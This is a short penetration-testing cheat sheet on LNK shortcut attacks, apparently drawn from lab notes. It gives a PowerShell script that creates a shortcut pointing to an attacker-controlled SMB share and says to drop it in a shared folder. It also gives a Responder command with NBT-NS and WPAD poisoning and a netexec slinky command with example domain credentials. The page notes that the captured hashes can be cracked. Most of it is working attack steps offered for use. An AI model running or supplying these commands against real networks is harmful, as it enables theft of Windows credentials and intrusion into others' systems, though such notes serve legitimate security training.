# LNK File Attacks
### Manual way
#### Step 1 - create a malicious LNK file
#### Create a file linking to our Kali Running responder
```
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.145.141\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
```
Put the shortcut in shared folder.
#### Step 2 - run the responder
```
sudo responder -I eth0 -v -dP
```
* `sudo`: Runs Responder with root privileges (required).
* `responder`: The main script to run the Responder tool.
* `-I eth0`: Specifies the network interface to listen on (e.g., `eth0`).
* `-v`: Enables verbose output.
* `-d`: Enables **NBT-NS (NetBIOS Name Service) poisoning**.
* `-P`: Enables **WPAD (Web Proxy Auto-Discovery Protocol) rogue proxy**.
Make sure SMB is on
#### Step 3 Exploit
Run the shortcut file and we will have a hash.
We can crack it as well
### Automated Way
Netexec can do it automatically. (slinky module)
```
netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149
```
It autocreates a LNK file.
{% embed url="" %}